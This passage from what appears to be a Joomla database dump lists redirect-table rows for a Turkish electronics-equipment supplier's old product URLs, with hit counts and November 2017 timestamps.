00:00:00',301),(13928,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-fırın/by,product_name',NULL,'','',1,0,'2017-11-25 23:09:05','0000-00-00 00:00:00',301),(13929,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,mf_name',NULL,'','',1,0,'2017-11-25 23:09:39','0000-00-00 00:00:00',301),(13930,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,product_sku?language=tr-tr',NULL,'','',1,0,'2017-11-25 23:10:10','0000-00-00 00:00:00',301),(13931,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,category_name',NULL,'','',4,0,'2017-11-25 23:10:34','0000-00-00 00:00:00',301),(13932,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim',NULL,'','',13,0,'2017-11-25 23:12:43','0000-00-00 00:00:00',301),(13933,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/spr-20-41-42-detail',NULL,'','',5,0,'2017-11-25 23:13:43','0000-00-00 00:00:00',301),(13934,'http://3s-technologies.com.tr/en/products/manufacturers/mirae',NULL,'','',36,0,'2017-11-25 23:30:30','0000-00-00 00:00:00',301),(13935,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,product_name',NULL,'','',11,0,'2017-11-25 23:30:33','0000-00-00 00:00:00',301),(13936,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/results,1-5?language=en-gb',NULL,'','',1,0,'2017-11-25 23:32:47','0000-00-00 00:00:00',301),(13937,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/thru-hole/by,category_name',NULL,'','',1,0,'2017-11-25 23:34:55','0000-00-00 00:00:00',301),(13938,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-ultra-hız/dirdesc',NULL,'','',1,0,'2017-11-25 23:36:03','0000-00-00 00:00:00',301),(13939,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_name/results,1-100',NULL,'','',1,0,'2017-11-25 23:38:41','0000-00-00 00:00:00',301),(13940,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-düşük-hızlı/by,category_name',NULL,'','',5,0,'2017-11-25 23:40:14','0000-00-00 00:00:00',301),(13941,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-orta-hızlı/by,product_sku',NULL,'','',1,0,'2017-11-25 23:40:18','0000-00-00 00:00:00',301),(13942,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-orta-hızlı',NULL,'','',1,0,'2017-11-25 23:43:01','0000-00-00 00:00:00',301),(13943,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/by,product_sku',NULL,'','',1,0,'2017-11-25 23:43:20','0000-00-00 00:00:00',301),(13944,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,product_name/dirdesc/results,1-100',NULL,'','',3,0,'2017-11-25 23:44:36','0000-00-00 00:00:00',301),(13945,'http://www.3s-technologies.com.tr/index.php/en/products/dalga-lehim/by,mf_name/dirdesc?language=en-gb',NULL,'','',24,0,'2017-11-25 23:53:04','0000-00-00 00:00:00',301),(13946,'http://3s-technologies.com.tr/en/products/dalga-lehim/by,product_sku',NULL,'','',15,0,'2017-11-25 23:59:32','0000-00-00 00:00:00',301),(13947,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,product_sku',NULL,'','',1,0,'2017-11-26 00:00:30','0000-00-00 00:00:00',301),(13948,'http://3s-technologies.com.tr/en/products/dalga-lehim/by,category_name',NULL,'','',12,0,'2017-11-26 00:00:48','0000-00-00 00:00:00',301),(13949,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/dirdesc',NULL,'','',2,0,'2017-11-26 00:01:37','0000-00-00 00:00:00',301),(13950,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,product_sku',NULL,'','',1,0,'2017-11-26 00:01:49','0000-00-00 00:00:00',301),(13951,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-26 00:02:41','0000-00-00 00:00:00',301),(13952,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,product_name',NULL,'','',2,0,'2017-11-26 00:04:33','0000-00-00 00:00:00',301),(13953,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız',NULL,'','',9,0,'2017-11-26 00:05:37','0000-00-00 00:00:00',301),(13954,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,product_name',NULL,'','',19,0,'2017-11-26 00:06:31','0000-00-00 00:00:00',301),(13955,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/dirdesc',NULL,'','',6,0,'2017-11-26 00:06:40','0000-00-00 00:00:00',301),(13956,'https://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,product_sku?error=404&language=en-gb',NULL,'','',1,0,'2017-11-26 00:07:06','0000-00-00 00:00:00',301),(13957,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/krem-lehim/by,product_name',NULL,'','',1,0,'2017-11-26 00:09:04','0000-00-00 00:00:00',301),(13958,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by?language=en-gb&mf_name/dirdesc',NULL,'','',1,0,'2017-11-26 00:21:38','0000-00-00 00:00:00',301),(13959,'http://3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/trident-detail',NULL,'','',7,0,'2017-11-26 00:30:14','0000-00-00 00:00:00',301),(13960,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/dirdesc',NULL,'','',6,0,'2017-11-26 00:31:48','0000-00-00 00:00:00',301),(13961,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,category_name',NULL,'','',2,0,'2017-11-26 00:37:43','0000-00-00 00:00:00',301),(13962,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/dirdesc',NULL,'','',2,0,'2017-11-26 00:39:47','0000-00-00 00:00:00',301),(13963,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturers/mirae',NULL,'','',5,0,'2017-11-26 00:42:07','0000-00-00 00:00:00',301),(13964,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,mf_name',NULL,'','',2,0,'2017-11-26 00:42:20','0000-00-00 00:00:00',301),(13965,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/spr-20-41-42-detail',NULL,'','',7,0,'2017-11-26 00:43:15','0000-00-00 00:00:00',301),(13966,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/results,1-10?language=en-gb',NULL,'','',3,0,'2017-11-26 00:43:37','0000-00-00 00:00:00',301),(13967,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler',NULL,'','',16,0,'2017-11-26 00:44:42','0000-00-00 00:00:00',301),(13968,'http://www.3s-technologies.com.tr/index.php/en/products/smd-fırın/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-26 00:46:02','0000-00-00 00:00:00',301),(13969,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by,mf_name?language=en-gb',NULL,'','',15,0,'2017-11-26 00:58:24','0000-00-00 00:00:00',301),(13970,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,product_name/dirdesc/results,1-100',NULL,'','',4,0,'2017-11-26 01:01:19','0000-00-00 00:00:00',301),(13971,'http://www.3s-technologies.com.tr/index.php/en/products/avf-detail?tmpl=component&print=1',NULL,'','',26,0,'2017-11-26 01:06:48','0000-00-00 00:00:00',301),(13972,'https://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2017-11-26 01:06:48','0000-00-00 00:00:00',301),(13973,'http://3s-technologies.com.tr/index.php/en/products/screen-printer/by,product_name/dirdesc?language=en-gb',NULL,'','',8,0,'2017-11-26 01:08:52','0000-00-00 00:00:00',301),(13974,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/dirdesc',NULL,'','',240,0,'2017-11-26 01:09:05','0000-00-00 00:00:00',301),(13975,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-orta-hızlı/am100-detail',NULL,'','',1,0,'2017-11-26 01:12:57','0000-00-00 00:00:00',301),(13976,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/am100-detail?tmpl=component&print=1',NULL,'','',1,0,'2017-11-26 01:16:01','0000-00-00 00:00:00',301),(13977,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/955lc-37-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-11-26 01:28:40','0000-00-00 00:00:00',301),(13978,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/by?`p`.product_sku&language=en-gb',NULL,'','',2,0,'2017-11-26 01:32:22','0000-00-00 00:00:00',301),(13979,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by?language=en-gb&ordering',NULL,'','',1,0,'2017-11-26 01:33:23','0000-00-00 00:00:00',301),(13980,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126&itemid=133&lang=tr',NULL,'','',15,0,'2017-11-26 01:36:44','0000-00-00 00:00:00',301),(13981,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name',NULL,'','',400,0,'2017-11-26 01:36:48','0000-00-00 00:00:00',301),(13982,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/thru-hole/by,product_sku',NULL,'','',1,0,'2017-11-26 01:37:40','0000-00-00 00:00:00',301),(13983,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/screen-printer/by,`p`.product_sku?language=en-gb',NULL,'','',14,0,'2017-11-26 01:37:58','0000-00-00 00:00:00',301),(13984,'https://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/by,product_name?language=en-gb',NULL,'','',1,0,'2017-11-26 01:38:22','0000-00-00 00:00:00',301),(13985,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,product_sku',NULL,'','',1,0,'2017-11-26 01:39:29','0000-00-00 00:00:00',301),(13986,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,category_name',NULL,'','',428,0,'2017-11-26 01:40:00','0000-00-00 00:00:00',301),(13987,'https://www.3s-technologies.com.tr/index.php/en/products/flux/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-26 01:41:07','0000-00-00 00:00:00',301),(13988,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim',NULL,'','',5,0,'2017-11-26 01:41:21','0000-00-00 00:00:00',301),(13989,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by?language=en-gb&mf_name',NULL,'','',1,0,'2017-11-26 01:42:08','0000-00-00 00:00:00',301),(13990,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/spr-20-41-42-detail?tmpl=component&print=1',NULL,'','',4,0,'2017-11-26 01:43:50','0000-00-00 00:00:00',301),(13991,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/krem-lehim/dirdesc',NULL,'','',1,0,'2017-11-26 01:55:13','0000-00-00 00:00:00',301),(13992,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,category_name',NULL,'','',2,0,'2017-11-26 01:55:16','0000-00-00 00:00:00',301),(13993,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/temizleme-makineleri/by,product_name',NULL,'','',1,0,'2017-11-26 01:55:27','0000-00-00 00:00:00',301),(13994,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-ultra-hız/by,product_name',NULL,'','',245,0,'2017-11-26 01:56:23','0000-00-00 00:00:00',301),(13995,'https://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/screen-printer/by,`p`.product_sku',NULL,'','',1,0,'2017-11-26 01:57:03','0000-00-00 00:00:00',301),(13996,'https://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-26 01:57:56','0000-00-00 00:00:00',301),(13997,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/dirdesc',NULL,'','',1,0,'2017-11-26 01:58:50','0000-00-00 00:00:00',301),(13998,'https://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-26 02:03:20','0000-00-00 00:00:00',301),(13999,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-fırın/dirdesc',NULL,'','',1,0,'2017-11-26 02:05:21','0000-00-00 00:00:00',301),(14000,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,category_name/dirdesc/results,1-10',NULL,'','',3,0,'2017-11-26 02:06:14','0000-00-00 00:00:00',301),(14001,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,mf_name',NULL,'','',428,0,'2017-11-26 02:12:15','0000-00-00 00:00:00',301),(14002,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,product_sku',NULL,'','',4,0,'2017-11-26 02:13:48','0000-00-00 00:00:00',301),(14003,'http://3s-technologies.com.tr/en/products/screen-printer/spr-20-detail/askquestion?tmpl=component',NULL,'','',14,0,'2017-11-26 02:14:51','0000-00-00 00:00:00',301),(14004,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/screen-printer/dirdesc',NULL,'','',2,0,'2017-11-26 02:15:31','0000-00-00 00:00:00',301),(14005,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler',NULL,'','',13,0,'2017-11-26 02:16:39','0000-00-00 00:00:00',301),(14006,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/results,1-20?language=en-gb',NULL,'','',4,0,'2017-11-26 02:18:02','0000-00-00 00:00:00',301),(14007,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,product_sku',NULL,'','',2,0,'2017-11-26 02:26:32','0000-00-00 00:00:00',301),(14008,'http://www.3s-technologies.com.tr/index.php/en/products/konveyorler',NULL,'','',27,0,'2017-11-26 02:26:49','0000-00-00 00:00:00',301),(14009,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/by,ordering?language=tr-tr',NULL,'','',24,0,'2017-11-26 02:27:10','0000-00-00 00:00:00',301),(14010,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/by,category_name',NULL,'','',9,0,'2017-11-26 02:28:55','0000-00-00 00:00:00',301),(14011,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/by?language=en-gb&product_name',NULL,'','',1,0,'2017-11-26 02:29:57','0000-00-00 00:00:00',301),(14012,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/by,product_sku?language=en-gb',NULL,'','',24,0,'2017-11-26 02:30:40','0000-00-00 00:00:00',301),(14013,'http://3s-technologies.com.tr/en/products/temizleme-makineleri/by,product_name',NULL,'','',17,0,'2017-11-26 02:37:49','0000-00-00 00:00:00',301),(14014,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/by,mf_name',NULL,'','',18,0,'2017-11-26 02:39:05','0000-00-00 00:00:00',301),(14015,'http://3s-technologies.com.tr/en/products/konveyorler/dirdesc',NULL,'','',15,0,'2017-11-26 02:40:42','0000-00-00 00:00:00',301),(14016,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,product_sku',NULL,'','',6,0,'2017-11-26 02:42:43','0000-00-00 00:00:00',301),(14017,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/screen-printer/by,mf_name?language=tr-tr',NULL,'','',24,0,'2017-11-26 02:45:39','0000-00-00 00:00:00',301),(14018,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-düşük-hızlı',NULL,'','',12,0,'2017-11-26 02:46:34','0000-00-00 00:00:00',301),(14019,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/dalga-lehim',NULL,'','',1,0,'2017-11-26 02:47:09','0000-00-00 00:00:00',301),(14020,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,product_name?language=tr-tr',NULL,'','',1,0,'2017-11-26 02:51:13','0000-00-00 00:00:00',301),(14021,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/245-sn63pb37-0.6mm-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-11-26 02:54:54','0000-00-00 00:00:00',301),(14022,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,category_name/dirdesc/results,1-20',NULL,'','',1,0,'2017-11-26 03:05:14','0000-00-00 00:00:00',301),(14023,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,category_name',NULL,'','',2,0,'2017-11-26 03:09:00','0000-00-00 00:00:00',301),(14024,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/by,product_name',NULL,'','',2,0,'2017-11-26 03:09:37','0000-00-00 00:00:00',301),(14025,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/dirdesc',NULL,'','',9,0,'2017-11-26 03:10:28','0000-00-00 00:00:00',301),(14026,'http://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-11-26 03:10:49','0000-00-00 00:00:00',301),(14027,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/results,1-50?language=en-gb',NULL,'','',7,0,'2017-11-26 03:11:08','0000-00-00 00:00:00',301),(14028,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/trident-detail?tmpl=component&print=1',NULL,'','',1,0,'2017-11-26 03:11:39','0000-00-00 00:00:00',301),(14029,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/av132-detail?tmpl=component&print=1',NULL,'','',1,0,'2017-11-26 03:11:41','0000-00-00 00:00:00',301),(14030,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,product_name',NULL,'','',1,0,'2017-11-26 03:12:21','0000-00-00 00:00:00',301),(14031,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/screen-printer/by,mf_name',NULL,'','',9,0,'2017-11-26 03:14:41','0000-00-00 00:00:00',301),(14032,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/spr-20-detail?tmpl=component&print=1',NULL,'','',1,0,'2017-11-26 03:15:59','0000-00-00 00:00:00',301),(14033,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-ultra-hız/by,category_name',NULL,'','',1,0,'2017-11-26 03:16:59','0000-00-00 00:00:00',301),(14034,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/trident-detail',NULL,'','',1,0,'2017-11-26 03:17:19','0000-00-00 00:00:00',301),(14035,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku?language=en-gb',NULL,'','',2,0,'2017-11-26 03:18:35','0000-00-00 00:00:00',301),(14036,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,product_name',NULL,'','',11,0,'2017-11-26 03:21:19','0000-00-00 00:00:00',301),(14037,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/results,1-40',NULL,'','',4,0,'2017-11-26 03:22:56','0000-00-00 00:00:00',301),(14038,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,mf_name',NULL,'','',5,0,'2017-11-26 03:23:46','0000-00-00 00:00:00',301),(14039,'https://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,`p`.product_sku/dirdesc?error=404&language=en-gb',NULL,'','',1,0,'2017-11-26 03:28:12','0000-00-00 00:00:00',301),(14040,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,product_name',NULL,'','',3,0,'2017-11-26 03:28:39','0000-00-00 00:00:00',301),(14041,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-fırın/by,category_name',NULL,'','',283,0,'2017-11-26 03:36:03','0000-00-00 00:00:00',301),(14042,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,category_name',NULL,'','',16,0,'2017-11-26 03:36:22','0000-00-00 00:00:00',301),(14043,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/screen-printer',NULL,'','',1,0,'2017-11-26 03:36:55','0000-00-00 00:00:00',301),(14044,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,product_name',NULL,'','',9,0,'2017-11-26 03:37:16','0000-00-00 00:00:00',301),(14045,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/dirdesc',NULL,'','',1,0,'2017-11-26 03:37:29','0000-00-00 00:00:00',301),(14046,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/screen-printer/by,mf_name/dirdesc?language=tr-tr',NULL,'','',18,0,'2017-11-26 03:38:30','0000-00-00 00:00:00',301),(14047,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/rh6-detail?tmpl=component&print=1',NULL,'','',3,0,'2017-11-26 03:38:54','0000-00-00 00:00:00',301),(14048,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,category_name',NULL,'','',3,0,'2017-11-26 03:39:05','0000-00-00 00:00:00',301),(14049,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,mf_name',NULL,'','',242,0,'2017-11-26 03:53:37','0000-00-00 00:00:00',301),(14050,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/krem-lehim/by,mf_name',NULL,'','',1,0,'2017-11-26 03:55:20','0000-00-00 00:00:00',301),(14051,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/dirdesc',NULL,'','',4,0,'2017-11-26 04:02:13','0000-00-00 00:00:00',301),(14052,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,category_name/dirdesc/results,1-20',NULL,'','',5,0,'2017-11-26 04:04:15','0000-00-00 00:00:00',301),(14053,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',24,0,'2017-11-26 04:20:34','0000-00-00 00:00:00',301),(14054,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/screen-printer/by,product_name',NULL,'','',17,0,'2017-11-26 04:20:58','0000-00-00 00:00:00',301),(14055,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-ultra-hız/by,product_sku',NULL,'','',243,0,'2017-11-26 04:21:25','0000-00-00 00:00:00',301),(14056,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/temizleme-makineleri/by,product_sku',NULL,'','',1,0,'2017-11-26 04:22:12','0000-00-00 00:00:00',301),(14057,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim',NULL,'','',18,0,'2017-11-26 04:23:41','0000-00-00 00:00:00',301),(14058,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri',NULL,'','',19,0,'2017-11-26 04:23:44','0000-00-00 00:00:00',301),(14059,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2017-11-26 04:33:45','0000-00-00 00:00:00',301),(14060,'http://3s-technologies.com.tr/index.php/en/products/krem-lehim/by?language=en-gb&product_name',NULL,'','',1,0,'2017-11-26 04:34:13','0000-00-00 00:00:00',301),(14061,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/thru-hole/by,product_name',NULL,'','',1,0,'2017-11-26 04:35:45','0000-00-00 00:00:00',301),(14062,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,category_name/results,1-5?language=en-gb',NULL,'','',1,0,'2017-11-26 04:39:40','0000-00-00 00:00:00',301),(14063,'http://3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/by,`p`.product_sku?language=tr-tr',NULL,'','',14,0,'2017-11-26 04:45:30','0000-00-00 00:00:00',301),(14064,'http://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/mx200lp-detail',NULL,'','',57,0,'2017-11-26 04:58:45','0000-00-00 00:00:00',301),(14065,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,category_name/dirdesc/results,1-10',NULL,'','',2,0,'2017-11-26 05:03:16','0000-00-00 00:00:00',301),(14066,'http://3s-technologies.com.tr/index.php/en/products/2.-el-makineler/by?language=en-gb&mf_name',NULL,'','',2,0,'2017-11-26 05:04:15','0000-00-00 00:00:00',301),(14067,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku?language=en-gb',NULL,'','',8,0,'2017-11-26 05:04:27','0000-00-00 00:00:00',301),(14068,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/by,mf_name/dirdesc',NULL,'','',2,0,'2017-11-26 05:13:00','0000-00-00 00:00:00',301),(14069,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/results,1-20',NULL,'','',6,0,'2017-11-26 05:15:04','0000-00-00 00:00:00',301),(14070,'http://www.3s-technologies.com.tr/index.php/en/products/flux/by?language=en-gb&product_sku',NULL,'','',1,0,'2017-11-26 05:15:49','0000-00-00 00:00:00',301),(14071,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/dirdesc?language=en-gb',NULL,'','',11,0,'2017-11-26 05:16:38','0000-00-00 00:00:00',301),(14072,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/flux/by,product_sku',NULL,'','',12,0,'2017-11-26 05:19:55','0000-00-00 00:00:00',301),(14073,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar',NULL,'','',39,0,'2017-11-26 05:23:22','0000-00-00 00:00:00',301),(14074,'http://www.3s-technologies.com.tr/tr/joomla/images/pdf/ews-310-wave-soldering-machine.pdf',NULL,'','',34,0,'2017-11-26 05:50:29','0000-00-00 00:00:00',301),(14075,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/by,category_name/dirdesc/results,1-20',NULL,'','',6,0,'2017-11-26 05:56:23','0000-00-00 00:00:00',301),(14076,'https://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim?error=404&language=en-gb',NULL,'','',2,0,'2017-11-26 06:01:14','0000-00-00 00:00:00',301),(14077,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,product_sku/results,1-20',NULL,'','',2,0,'2017-11-26 06:02:17','0000-00-00 00:00:00',301),(14078,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer',NULL,'','',17,0,'2017-11-26 06:05:39','0000-00-00 00:00:00',301),(14079,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,`p`.product_sku?language=en-gb',NULL,'','',3,0,'2017-11-26 06:08:11','0000-00-00 00:00:00',301),(14080,'https://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/by?category_name&error=404&language=en-gb',NULL,'','',2,0,'2017-11-26 06:22:47','0000-00-00 